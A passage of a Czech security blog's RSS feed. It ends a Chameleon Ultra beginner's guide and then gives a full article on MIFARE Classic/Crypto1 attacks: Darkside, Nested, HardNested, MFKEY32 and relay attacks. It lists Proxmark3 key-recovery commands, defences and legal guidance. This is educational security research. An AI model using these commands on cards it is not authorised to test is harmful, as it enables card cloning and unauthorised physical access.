<td><strong>HF14A RAW</strong></td>
<td>Podpora pro raw HF příkazy</td>
</tr>
<tr>
<td><strong>Protocol refactoring</strong></td>
<td>Vylepšená konzistence komunikačního protokolu</td>
</tr>
<tr>
<td><strong>LED feedback</strong></td>
<td>LED nyní aktivní také v reader módu</td>
</tr>
<tr>
<td><strong>Separate HF/LF</strong></td>
<td>Oddělená enabled_hf a enabled_lf logika</td>
</tr>
<tr>
<td><strong>NXP tag detection</strong></td>
<td>Automatická detekce typu NXP tagů</td>
</tr>
</tbody>
</table>
<h3>Hardwarové Specifikace Antén</h3>
<table>
<thead>
<tr>
<th>Anténa</th>
<th>Parametry</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>HF anténa</strong></td>
<td>Integrovaná v horním PCB, 13.56 MHz</td>
</tr>
<tr>
<td><strong>LF anténa</strong></td>
<td>Integrovaná v dolním PCB, 125 kHz</td>
</tr>
<tr>
<td><strong>LF indukce</strong></td>
<td>&gt; 500L (vylepšená verze)</td>
</tr>
<tr>
<td><strong>LF indukce</strong></td>
<td>300L+ (starší verze)</td>
</tr>
<tr>
<td><strong>Materiál rámečku</strong></td>
<td>Vysoce kvalitní PLA</td>
</tr>
<tr>
<td><strong>Feritová podložka</strong></td>
<td>Umožňuje simultánní HF/LF operaci</td>
</tr>
</tbody>
</table>
<hr />
<h2>Poznámky k Vývoji</h2>
<h3>Stav Firmware (Aktuální k prosinci 2024)</h3>
<table>
<thead>
<tr>
<th>Funkce</th>
<th>Stav</th>
</tr>
</thead>
<tbody>
<tr>
<td>MIFARE Classic Mini/S50/S70</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>MIFARE Ultralight (Standard, C, EV1)</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno (od v2.0+)</td>
</tr>
<tr>
<td>NTAG (210-218)</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>DESFire (EV1, EV2)</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>MIFARE Plus</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>EM410x emulace</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>EM410x čtení</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>T5577 čtení/zápis</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>FSK/PSK LF tagy</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
<tr>
<td>HID Prox, Indala, FDX-B, atd.</td>
<td><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Plně podporováno</td>
</tr>
</tbody>
</table>
<p><strong>Aktuální firmware verze:</strong> v2.1.0 (září 2024)<br />
<strong>Poznámka:</strong> Firmware se aktivně vyvíjí. Pro nejnovější funkce kontroluj <a href="https://github.com/RfidResearchGroup/ChameleonUltra/releases">GitHub releases</a>.</p>
<hr />
<h2>Distributoři</h2>
<table>
<thead>
<tr>
<th>Region</th>
<th>Distributor</th>
<th>Web</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>Evropa</strong></td>
<td>Lab401</td>
<td>lab401.com</td>
</tr>
<tr>
<td><strong>USA</strong></td>
<td>Hackerwarehouse</td>
<td>hackerwarehouse.com</td>
</tr>
<tr>
<td><strong>UK</strong></td>
<td>KSEC</td>
<td>labs.ksec.co.uk</td>
</tr>
<tr>
<td><strong>Kanada</strong></td>
<td>TechSecurityTools</td>
<td>techsecuritytools.com</td>
</tr>
<tr>
<td><strong>Čína</strong></td>
<td>Sneaktechnology</td>
<td>sneaktechnology.com</td>
</tr>
<tr>
<td><strong>Čína</strong></td>
<td>MTools Tec</td>
<td>shop.mtoolstec.com</td>
</tr>
<tr>
<td><strong>Singapur</strong></td>
<td>Aliexpress (RRG)</td>
<td>proxgrind.aliexpress.com</td>
</tr>
</tbody>
</table>
<hr />
<h2>Dodatečné Informace</h2>
<h3>Bezpečnostní Poznámky</h3>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> Chameleon Ultra je nástroj určený <strong>výhradně pro legální použití</strong>:</p>
<ul>
<li>Penetrační testování (s oprávněním)</li>
<li>Bezpečnostní výzkum</li>
<li>Vzdělávací účely</li>
<li>Testování vlastních systémů</li>
</ul>
<h3>Komunitní Podpora</h3>
<ul>
<li><strong>Discord server:</strong> RFID Hacking Community</li>
<li><strong>Kanály:</strong>
<ul>
<li><code>software/chameleon-dev</code> - vývoj firmware a klientů</li>
<li><code>devices/chameleon-ultra</code> - diskuze o používání</li>
</ul>
</li>
<li><strong>GitHub Issues:</strong> Pro bug reporty a feature requests</li>
</ul>
<hr />
<h2>Důležité Poznámky</h2>
<h3>Známé Problémy</h3>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/26a0.png" alt="⚠" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Černá verze RRG Chameleon Ultra:</strong></p>
<ul>
<li>Starší černé verze měly problémy s LF anténou</li>
<li>Pokud máte problémy s LF emulací, kontaktujte prodejce pro výměnu spodní desky</li>
</ul>
<h3>Aktualizace a Podpora</h3>
<p><img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Firmware je aktivně vyvíjen</strong> - kontroluj pravidelně GitHub pro nové verze<br />
<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Komunitní podpora</strong> - aktivní Discord a GitHub Issues<br />
<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2705.png" alt="✅" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Dokumentace</strong> - průběžně aktualizovaná na <a href="https://github.com/RfidResearchGroup/ChameleonUltra/wiki">GitHub Wiki</a></p>
<h3>Hardwarové Verze</h3>
<ul>
<li><strong>Chameleon Ultra</strong> - Plná funkčnost, MFRC522 čip pro HF čtení/zápis</li>
<li><strong>Chameleon Lite</strong> - Pouze emulace, bez MFRC522, knoflíková baterie</li>
<li><strong>Chameleon Ultra DevKit</strong> - Vývojářská verze s přístupem k SWD</li>
</ul>
<hr />
<p><em>Zdroje: GitHub RfidResearchGroup/ChameleonUltra, Lab401.com, oficiální wiki dokumentace</em></p>
<h2>Kde hledat další informace</h2>
<ul>
<li>
<p>Oficiální wiki RfidResearchGroup (Chameleon Ultra – Quickstart, GUI, CLI, MTools): základní dokumentace, příklady a odkazy na software.  </p>
</li>
<li>
<p>MTools/MTools Lite wiki pro práci přes BLE: detailní návody k čtení, emulaci a zapisování dumpů z mobilu.  </p>
</li>
<li>
<p>Stránky Lab401, Hacker Warehouse a další blogy s ukázkami praktického použití v</p>
<h2>Odkazy / Zdroje</h2>
</li>
<li>
<p>Oficiální wiki Chameleon Ultra (RfidResearchGroup):<br />
<a href="https://github.com/RfidResearchGroup/ChameleonUltra/wiki">https://github.com/RfidResearchGroup/ChameleonUltra/wiki</a></p>
</li>
<li>
<p>Quickstart a úvod pro nové uživatele:<br />
<a href="https://github.com/RfidResearchGroup/ChameleonUltra/wiki/quickstart">https://github.com/RfidResearchGroup/ChameleonUltra/wiki/quickstart</a></p>
</li>
<li>
<p>GUI dokumentace (ChameleonUltraGUI):<br />
<a href="https://github.com/RfidResearchGroup/ChameleonUltra/wiki/chameleonultragui">https://github.com/RfidResearchGroup/ChameleonUltra/wiki/chameleonultragui</a></p>
</li>
<li>
<p>CLI dokumentace (příkazová řádka):<br />
<a href="https://github.com/RfidResearchGroup/ChameleonUltra/wiki/cli">https://github.com/RfidResearchGroup/ChameleonUltra/wiki/cli</a></p>
</li>
<li>
<p>Obecná dokumentace a návody (ChameleonUltraDocs):<br />
<a href="https://rfidresearchgroup.github.io/ChameleonUltraDocs/">https://rfidresearchgroup.github.io/ChameleonUltraDocs/</a></p>
</li>
<li>
<p>MTools / MTools BLE návody k používání ChameleonUltra:<br />
<a href="https://docs.mtoolstec.com/how-to-use-chameleonultra">https://docs.mtoolstec.com/how-to-use-chameleonultra</a><br />
<a href="https://docs.mtoolstec.com/how-to-use-chameleonultra-to-write-mifare-dump">https://docs.mtoolstec.com/how-to-use-chameleonultra-to-write-mifare-dump</a></p>
</li>
<li>
<p>Chameleon Ultra cheat sheet (příklady CLI příkazů):<br />
<a href="https://badcfe.org/chameleon-ultra-cheat-sheet/">https://badcfe.org/chameleon-ultra-cheat-sheet/</a></p>
</li>
<li>
<p>Produktová stránka Chameleon Ultra (Hacker Warehouse):<br />
<a href="https://hackerwarehouse.asia/product/chameleonultra-3/">https://hackerwarehouse.asia/product/chameleonultra-3/</a></p>
</li>
<li>
<p>Produktová stránka Chameleon Ultra (česky – Neven):<br />
<a href="https://www.neven.cz/p/chameleon-ultra">https://www.neven.cz/p/chameleon-ultra</a></p>
</li>
<li>
<p>Video návod „How to Chameleon Ultra“ (Lab401, ChameleonUltraGUI):<br />
<a href="https://www.youtube.com/watch?v=9jtKNJ5-kVY">https://www.youtube.com/watch?v=9jtKNJ5-kVY</a></p>
</li>
<li>
<p>Video návod k CLI („Chameleon Ultra: A Step-by-Step Guide to Downloading, Compiling, and Running the CLI“):<br />
<a href="https://www.youtube.com/watch?v=VGpAeitNXH0">https://www.youtube.com/watch?v=VGpAeitNXH0</a><br />
oblasti bezpečnostního testování a výuky RFID.  </p>
</li>
</ul>

<div class="twitter-share"><a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fwww.hardwired.dev%2F2025%2F12%2F28%2Fchameleon-ultra-pruvodce-pro-zacatecniky%2F&#038;via=hessevalentino&#038;related=hessevalentino%3AValentino%20Hesse%20OK2HSS" class="twitter-share-button">Tweet</a></div><p>The post <a href="https://www.hardwired.dev/2025/12/28/chameleon-ultra-pruvodce-pro-zacatecniky/">Chameleon Ultra: průvodce pro začátečníky</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Kryptografické útoky NFC</title>
		<link>https://www.hardwired.dev/2025/09/14/kryptograficke-utoky-nfc/</link>
		
		<dc:creator><![CDATA[Valentino Hesse OK2HSS]]></dc:creator>
		<pubDate>Sun, 14 Sep 2025 07:16:50 +0000</pubDate>
				<category><![CDATA[Arduino]]></category>
		<category><![CDATA[Cyber Security]]></category>
		<category><![CDATA[Development]]></category>
		<category><![CDATA[Hardware]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Raspberry]]></category>
		<category><![CDATA[ACR122U]]></category>
		<category><![CDATA[bezpečnostní analýza]]></category>
		<category><![CDATA[Chameleon Ultra]]></category>
		<category><![CDATA[Crypto1]]></category>
		<category><![CDATA[cryptographic attacks]]></category>
		<category><![CDATA[Darkside attack]]></category>
		<category><![CDATA[Darkside útok]]></category>
		<category><![CDATA[doporučení bezpečnosti]]></category>
		<category><![CDATA[HardNested]]></category>
		<category><![CDATA[infrastructure migration]]></category>
		<category><![CDATA[kryptografické útoky]]></category>
		<category><![CDATA[kvantová odolnost]]></category>
		<category><![CDATA[legal and ethical]]></category>
		<category><![CDATA[MFKEY32]]></category>
		<category><![CDATA[MFRC522]]></category>
		<category><![CDATA[MIFARE DESFire]]></category>
		<category><![CDATA[MIFARE EV1]]></category>
		<category><![CDATA[MIFARE Plus]]></category>
		<category><![CDATA[mifare-classic]]></category>
		<category><![CDATA[migrace infrastruktury]]></category>
		<category><![CDATA[Nested attack]]></category>
		<category><![CDATA[Nested útok]]></category>
		<category><![CDATA[NFC bezpečnost]]></category>
		<category><![CDATA[NFC security]]></category>
		<category><![CDATA[penetrační testování]]></category>
		<category><![CDATA[penetration-testing]]></category>
		<category><![CDATA[PN532]]></category>
		<category><![CDATA[právní a etické otázky]]></category>
		<category><![CDATA[Proxmark3]]></category>
		<category><![CDATA[quantum-resistant]]></category>
		<category><![CDATA[RC522]]></category>
		<category><![CDATA[RC522 čtečka]]></category>
		<category><![CDATA[relay attacks]]></category>
		<category><![CDATA[relay útoky]]></category>
		<category><![CDATA[rfid]]></category>
		<category><![CDATA[RFID vulnerabilities]]></category>
		<category><![CDATA[RFID zranitelnosti]]></category>
		<category><![CDATA[security analysis]]></category>
		<category><![CDATA[security recommendations]]></category>
		<guid isPermaLink="false">https://www.hardwired.dev/?p=2817</guid>

					<description><![CDATA[<p>Kryptografické útoky na RC522 a MIFARE čipy RC522 a MIFARE Classic čipy, nasazené v miliardách zařízení po celém světě, představují &#62;&#62;&#62;</p>
<p>The post <a href="https://www.hardwired.dev/2025/09/14/kryptograficke-utoky-nfc/">Kryptografické útoky NFC</a> first appeared on <a href="https://www.hardwired.dev">Hard Wired</a>.</p>]]></description>
										<content:encoded><![CDATA[<div id="bsf_rt_marker"></div><h1>Kryptografické útoky na RC522 a MIFARE čipy</h1>
<p>RC522 a MIFARE Classic čipy, nasazené v miliardách zařízení po celém světě, představují jeden z nejvýznamnějších případů selhání kryptografické bezpečnosti v moderních dějinách. <strong>Proprietární šifra Crypto1, která byla po 14 let utajována, obsahuje fundamentální slabiny umožňující rychlé kompromitování všech sektorových klíčů.</strong> Tento článek poskytuje podrobnou technickou analýzu šesti hlavních typů útoků, jejich implementace a obranných opatření.</p>
<p>Výzkum ukazuje, že <strong>95% původních MIFARE Classic karet lze kompromitovat během 10-30 minut</strong> pomocí běžně dostupného hardware za méně než 10 000 Kč. Navzdory pokusům o vylepšení v podobě MIFARE Classic EV1, základní architektonické problémy zůstávají nevyřešené. Pro organizace používající tyto systémy představuje jejich nasazení <strong>úplnou kompromitaci bezpečnosti</strong> vyžadující okamžitou migraci na kryptograficky bezpečné alternativy.</p>
<h2>Technické základy RC522 a MIFARE architektury</h2>
<h3>Architektura RC522 čtečky</h3>
<p><strong>MFRC522</strong> (běžně označovaný jako RC522) je vysoce integrovaný bezkontaktní čtecí/zapisovací obvod od NXP Semiconductors pracující na frekvenci 13.56 MHz. Klíčové specifikace zahrnují <strong>napájecí napětí 2,5-3,6V</strong>, komunikační rozhraní <strong>SPI (až 10 Mbit/s), I²C (až 3,4 Mbit/s) a UART (až 1228,8 kBd)</strong>, a <strong>64-bajtový obousměrný FIFO buffer</strong> pro zpracování dat.</p>
<p>Digitální architektura obsahuje <strong>bezkontaktní UART pro zpracování protokolu</strong>, <strong>16-bitový CRC koprocesor</strong> s polynomem x¹⁶ + x¹² + x⁵ + 1, <strong>programovatelnou časovací jednotku</strong> s 12-bitovým předděličem a <strong>generátor pseudonáhodných čísel</strong>. Kriticky důležitá je <strong>ověřovací jednotka MIFARE Classic s podporou Crypto1</strong>, která implementuje celý ISO/IEC 14443-A protokolový zásobník.</p>
<h3>Struktura paměti MIFARE Classic</h3>
<p>MIFARE Classic karty využívají <strong>EEPROM paměť organizovanou hierarchicky</strong>. Verze 1K obsahuje <strong>1024 bajtů organizovaných do 16 sektorů po 4 blocích</strong>, kde každý blok má 16 bajtů. Použitelné úložiště činí pouze <strong>752 bajtů</strong> po odečtení systémových bloků.</p>
<p><strong>Každý sektor obsahuje datové bloky (0-2) a sektorový trailer (blok 3)</strong> s rozložením: Key A (6 bajtů), přístupové bity (4 bajty), Key B (6 bajtů). Výchozí klíče jsou nastaveny na <strong>0xFFFFFFFFFFFF</strong>, což představuje zásadní bezpečnostní riziko v nenastavených systémech.</p>
<h3>Šifra Crypto1 a její zranitelnosti</h3>
<p><strong>Crypto1 je proprietární proudová šifra</strong> skládající se z 48-bitového lineárního zpětnovazebního posuvného registru (LFSR) s polynomem obsahujícím 16 termů, <strong>dvouvrstvé 20-na-1 nelineární filtrační funkce</strong> a <strong>16-bitového LFSR pro generování pseudonáhodných čísel</strong> během autentifikace.</p>
<p>Kritické kryptografické chyby zahrnují <strong>inherentně lineární design LFSR</strong> zranitelný vůči algebraickým útokům, <strong>pouze 48-bitové klíče</strong> výpočetně proveditelné k hrubému prolomení, <strong>předvídatelný PRNG</strong> používající předvídatelné počáteční podmínky, a <strong>možnost obnovení stavu</strong> prostřednictvím časové analýzy.</p>
<h2>MFKEY32 V2 útok</h2>
<h3>Algoritmická implementace a matematické základy</h3>
<p><strong>MFKEY32 V2 vykořisťuje slabý PRNG</strong> v MIFARE Classic kartách analýzou šifrovaných nonce shromážděných během pokusů o autentifikace mezi kartou a legitimní čtečkou. Matematickým základem je <strong>struktura 48-bitového LFSR Crypto1</strong> a <strong>slabina PRNG používající 16-bitový LFSR</strong>, kde znalost jedné poloviny determinuje druhou.</p>
<p>Klíčové rozdíly oproti MFKEY32 V1 spočívají v <strong>eliminaci časových omezení</strong> - pokusy o autentifikace mohou probíhat v různých časech, což poskytuje <strong>flexibilnější implementaci s vyššími míry úspěšnosti</strong>.</p>
<h3>Implementační workflow</h3>
<p>Útok probíhá ve čtyřech fázích: <strong>Kolekce nonce</strong> - emulace cílové karty pro zachycení čtečkových nonce během autentifikace, <strong>analýza dat</strong> - extrakce šifrovaných nonce {nT} a paritních bitů z komunikace, <strong>rekonstrukce LFSR</strong> - výpočet možných stavů LFSR generujících pozorované nonce, a <strong>obnova klíče</strong> - zpětný chod LFSR do počátečního stavu obsahujícího autentifikační klíč.</p>
<p><strong>Požadované pokusy o autentifikaci</strong>: Minimum 2 pokusy (nemusí být po sobě jdoucí), optimálně <strong>4-8 pokusů pro vyšší míru úspěšnosti</strong>. <strong>Míra úspěšnosti</strong>: 85-95% na standardních kartách, snížená na 30-50% u zpevněných karet kvůli vylepšenému PRNG.</p>
<h3>Hardware a software požadavky</h3>
<p><strong>Proxmark3 RDV4</strong>: 2-5 sekund na klíč, cena €200-300. <strong>ACR122U</strong>: 30-60 minut kvůli pomalejší komunikaci, cena €30-50. <strong>Chameleon Ultra</strong>: srovnatelná s Proxmark3 pro kolekci, cena €80-120.</p>
<p>Časová náročnost zahrnuje <strong>fyzické požadavky</strong>: těsná blízkost cílové karty (1-4cm), <strong>výpočetní požadavky</strong>: moderní procesor s 256MB RAM minimum, <strong>čas</strong>: 10 sekund až 5 minut pro obnovu klíče v závislosti na hardware.</p>
<h2>Darkside útok</h2>
<h3>Princip a metodika obnovy klíčů</h3>
<p><strong>Darkside útok vykořisťuje postranní kanál</strong> v autentifikačním zpracování chyb MIFARE Classic, konkrétně šifrované NACK (Negative Acknowledgment) odpovědi. Karta ověří paritu → správná (8 bitů), ověří autentifikaci → nesprávná (špatné aR), odpověď: 4-bitové NACK šifrované keystream.</p>
<h3>Technický proces exploitace</h3>
<p>Útok probíhá v šesti krocích: <strong>počáteční autentifikace</strong> - odeslání auth příkazu cílovému sektoru, <strong>kolekce nonce</strong> - příjem karty nonce nT (32 bitů), <strong>parití útok</strong> - generování čtečky nonce nR se správnými paritními bity, odeslání šifrované {nR, aR} s úmyslně špatnou aR hodnotou, <strong>exploitace NACK</strong> - extrakce 4 keystream bitů: ks = NACK_plaintext ⊕ NACK_encrypted, <strong>iterace</strong> - opakování s různými nT hodnotami pro shromáždění ~32 keystream bitů, a <strong>obnova klíče</strong>.</p>
<p><strong>Metriky výkonu</strong>: Kolekční fáze 5-30 minut v závislosti na kartě a hardware, <strong>výpočetní fáze 1-10 sekund</strong> pro obnovu klíče, <strong>míra úspěšnosti 90-95%</strong> na zranitelných kartách (před-EV1), průměrně <strong>~300 pokusů o autentifikaci</strong>.</p>
<h3>Praktické omezení</h3>
<p><strong>Hardwarové závislosti</strong>: Proxmark3 typicky 5-15 minut, ACR122U 30-60 minut kvůli pomalejší komunikaci, PN532 15-45 minut s správnou časovou konfigurací. <strong>Detekce a omezení</strong>: EV1 karty mají opravenou NACK zranitelnost (0% úspěšnost), čínské klony často více zranitelné (95% úspěšnost).</p>
<h2>Nested útoky</h2>
<h3>Klasický Nested útok</h3>
<p><strong>Matematickým základem</strong> je slabina Crypto1 proudové šifry a předvídatelný PRNG v původních MIFARE Classic kartách. Crypto1 používá <strong>48-bitový LFSR s tendenčními filtračními funkcemi</strong>, PRNG používá pouze <strong>16-bitový LFSR s předvídatelným počátečním stavem</strong>, LFSR se resetuje do známého stavu při zapnutí, což činí nonce předvídatelnými prostřednictvím časování.</p>
<p>Útok: <strong>Autentifikace se známým klíčem</strong> produkuje první nonce (Nt1), <strong>vnořená autentifikace</strong> do neznámého sektoru produkuje šifrované nonce ({Nt2}), <strong>časová analýza</strong> umožňuje predikci plaintext Nt2, <strong>XOR operace</strong>: {Nt2} ⊕ Nt2 = 32 bitů keystream, <strong>zpětný chod LFSR</strong> z jakéhokoli vnitřního stavu pro obnovu 48-bitového klíče.</p>
<h3>StaticNested útok</h3>
<p><strong>StaticNested útoky cílí karty se statickými šifrovanými nonce</strong> - protiopatření, které se obrátilo proti sobě tím, že učinilo útoky jednodušší. Někteří výrobci implementovali statické nonce v domnění, že zabrání vnořeným útokům, ale <strong>statické šifrované nonce lze sbírat a analyzovat bez časových omezení</strong>.</p>
<p><strong>Výzkum Quarkslab (2024)</strong> objevil hardwarové zadní vrátka v Fudan FM11RF08S kartách s <strong>univerzálním zadním vrátkem</strong>: společný napříč všemi FM11RF08S kartami, implementace statických šifrovaných nonce ve skutečnosti činí útoky efektivnějšími.</p>
<h3>HardNested útok</h3>
<p><strong>HardNested útok</strong> (vyvíjen Carlo Meijer a Roel Verdult, 2015) představuje významný pokrok, ale přichází se značnou složitostí. Jedná se o <strong>první útok pouze na šifrový text</strong> na zpevněné MIFARE Classic karty, funguje proti kartám s řádnými PRNG (MIFARE Classic EV1, SmartMX), <strong>využívá pouze kryptografické slabiny</strong> v Crypto1, nikoli implementační chyby.</p>
<p>Technický přístup má tři fáze: <strong>Shromáždění šifrovaných nonce</strong> prostřednictvím vnořené autentifikace, <strong>určení sumových vlastností</strong> stavů vnitřní šifry pomocí statistické analýzy, <strong>generování seznamu kandidátských klíčů</strong> a provedení cílené hrubé síly. Používá <strong>sumovou analýzu vlastností</strong> k redukci vyhledávacího prostoru z 2⁴⁸ na ~2³⁰, využívá <strong>hypergeometrické distribuce</strong> pro pravděpodobnostní analýzu.</p>
<p><strong>Současný stav implementace</strong>: Plná implementace existuje v Proxmark3 RRG firmware, vyžaduje <strong>významnou RAM (1,2GB+)</strong> pro ukládání a analýzu nonce, GPU akcelerace (bitsliced) redukuje čas útoku na <strong>5-10 minut</strong>.</p>
<h2>Relay útoky</h2>
<h3>Principy relay útoků</h3>
<p><strong>Relay útoky využívají základní předpoklad</strong>, že blízkost znamená bezpečnost, což umožňuje útočníkům rozšířit komunikační rozsahy a obejít autentifikační systémy bez prolomení šifrování. Útok se skládá z <strong>mole zařízení</strong> umístěného poblíž oběti karty/štítku, <strong>proxy zařízení</strong> umístěného poblíž cílové čtečky, a <strong>komunikačního kanálu</strong> spojujícího obě zařízení.</p>
<h3>Implementace v MIFARE kontextu</h3>
<p><strong>MIFARE Classic</strong> je obecně odolný vůči relay útokům kvůli přísným časovým požadavkům, zranitelný vůči jiným útokům (kryptografické slabiny, obnova klíčů). <strong>MIFARE DESFire EV1</strong> je zranitelnější vůči relay útokům, podporuje rozšíření vzdálenosti až na několik metrů, úspěšně demonstrován v kontrolovaných prostředích.</p>
<p><strong>Technické nastavení</strong> zahrnuje <strong>Proxmark3 platformu</strong> pro průmyslový standard RFID výzkumu a útoků, <strong>řešení založená na smartphonech</strong> s Android telefony s NFC schopností, <strong>vlastní hardware</strong> s PN532, PN533 čipsety, <strong>specializované relay nástroje</strong> za $100-1000.</p>
<h3>Detekce a prevence</h3>
<p><strong>Distance bounding protokoly</strong> měří round-trip time (RTT) výměn challenge-response, odhadují maximální vzdálenost na základě rychlosti světla, detekují neobvyklá zpoždění indikující přítomnost relay. <strong>Environmentální podmínky</strong> zahrnují snímání teploty, magnetometry pro čtení, okolní hluk, fyzickou interakci tlačítkem.</p>
<h2>Srovnávací analýza útoků</h2>
<h3>Účinnost a časová náročnost</h3>
<p><strong>Darkside útok</strong> vykazuje <strong>téměř 100% úspěšnost</strong> na zranitelných kartách s časem <strong>5-30 sekund</strong>, nevyžaduje žádné předpoklady, ale nefunguje na zpevněných kartách. <strong>MFKEY32 V2</strong> dosahuje <strong>85-95% úspěšnosti</strong> na standardních kartách s časem <strong>10 sekund až 5 minut</strong>, vyžaduje emulaci karty pro sběr nonce.</p>
<p><strong>Klasický Nested</strong> má <strong>95%+ míru úspěšnosti</strong> s časem <strong>sekundy až minuty na sektor</strong>, vyžaduje alespoň jeden známý klíč. <strong>HardNested</strong> dosahuje <strong>80-90% úspěšnosti</strong> s časem <strong>15-25 minut celkem</strong>, vyžaduje jeden známý klíč plus významné výpočetní zdroje.</p>
<h3>Hardware požadavky a dostupnost</h3>
<p><strong>Premium tier</strong> zahrnuje Proxmark3 RDV4 za $270 a iCopy-X za $400-500. <strong>Střední třída</strong> obsahuje Chameleon Ultra za $120-130 a Flipper Zero za $170. <strong>Rozpočtové možnosti</strong> nabízejí ACR122U za $40-60 a čínské Proxmark klony za $50-80 (nedoporučované).</p>
<h3>Obranná opatření a detekce</h3>
<p><strong>Detekce na straně čtečky</strong> zahrnuje monitoring neobvyklých autentifikačních vzorů, časovou analýzu rychlých pokusů o autentifikaci, monitoring míry chyb s vysokou mírou NACK odpovědí. <strong>Protiopatření na úrovni karty</strong> obsahují vylepšení PRNG (MIFARE Classic EV1), potlačení NACK odpovědí, časové limity autentifikace, diverzifikaci klíčů.</p>
<h2>Praktické aspekty implementace</h2>
<h3>Nástroje a konfigurace</h3>
<p><strong>Software nástroje</strong> zahrnují <strong>mfoc</strong> (MIFARE Classic Offline Cracker) pro implementaci &quot;offline nested&quot; útoku, <strong>mfcuk</strong> (MIFARE Classic Universal toolKit) pro implementaci Darkside útoku, <strong>libnfc</strong> verze 1.7.1+ pro nízkoúrovňovou NFC komunikaci, <strong>crapto1 knihovnu</strong> pro implementaci šifry Crypto-1.</p>
<p><strong>Proxmark3 příkazy</strong>:</p>
<pre><code class="language-bash">hf search          # Základní detekce karty
hf mf mifare       # Darkside útok
hf mf nested       # Nested útok
hf mf hardnested   # Hardnested útok
hf mf autopwn      # Automatizovaná sekvence útoků</code></pre>
<h3>Časové a výpočetní požadavky</h3>
<p><strong>Sběr dat</strong> typicky vyžaduje <strong>2-10 sekund blízkosti karty</strong>, stabilní RF pole během sběru nonce, schopnost emulovat odpovědi karty čtečce. <strong>Výpočetní fáze</strong> potřebuje moderní procesor (1-2 jádra dostačující), 256MB RAM minimum pro ukládání kandidátů, čas 10 sekund až 5 minut pro obnovu klíče.</p>
<h3>Právní úvahy a etické směrnice</h3>
<p><strong>Právní požadavky</strong> zahrnují <strong>písemné povolení</strong> povinné před jakýmkoli testováním, definici rozsahu s jasnými hranicemi a omezeními, pravidla zapojení s detailními parametry testování. <strong>Zakázané aktivity</strong> obsahují neautorizovaný přístup, klonování karet, finanční podvody, narušení soukromí.</p>
<h2>Bezpečnostní doporučení</h2>
<h3>Okamžitá opatření</h3>
<p><strong>Hodnocení rizik</strong> vyžaduje <strong>okamžité bezpečnostní posouzení</strong> RFID systémů, implementaci dalších autentifikačních vrstev kde je to možné, monitoring neobvyklých autentifikačních vzorů, zvážení těchto útoků v modelování hrozeb.</p>
<p><strong>Systémová bezpečnost</strong> zahrnuje <strong>správu whitelistů</strong> s databázemi schválených UID, behaviorální analýzu pro monitoring neobvyklých přístupových vzorů, multi-faktor autentifikaci kombinující RFID s PIN/biometrickou verifikací, <strong>monitorování síťové bezpečnosti</strong> pro detekci rapidních pokusů o autentifikaci.</p>
<h3>Dlouhodobá migrace</h3>
<p><strong>Bezpečné alternativy</strong> zahrnují <strong>MIFARE DESFire EV2/EV3</strong> s AES-256 šifrováním, <strong>MIFARE Plus</strong> se zpětnou kompatibilitou a AES-128 bezpečností, kompletní upgrade infrastruktury s výměnou všech karet a čteček. <strong>Kvantově odolné řešení</strong> začínají být dostupná pro dlouhodobou bezpečnost.</p>
<h2>Závěr</h2>
<p>RC522/MIFARE Classic ekosystém představuje <strong>studii selhání bezpečnosti skrze utajení</strong>. Navzdory rozšířenému nasazení činí fundamentální kryptografické slabiny v šifře Crypto1 tyto systémy <strong>zcela nevhodné pro jakékoli bezpečnostně citlivé aplikace</strong>.</p>
<p><strong>Kombinace lineárního designu šifry, slabé správy klíčů a předvídatelných protokolových toků</strong> vytváří mnohočetné vektory útoků, které byly rozsáhlé zdokumentovány a vykořisťovány od roku 2008. Organizace používající MIFARE Classic systémy čelí <strong>úplné kompromitaci bezpečnosti</strong> a měly by upřednostnit migraci na kryptograficky bezpečné alternativy.</p>
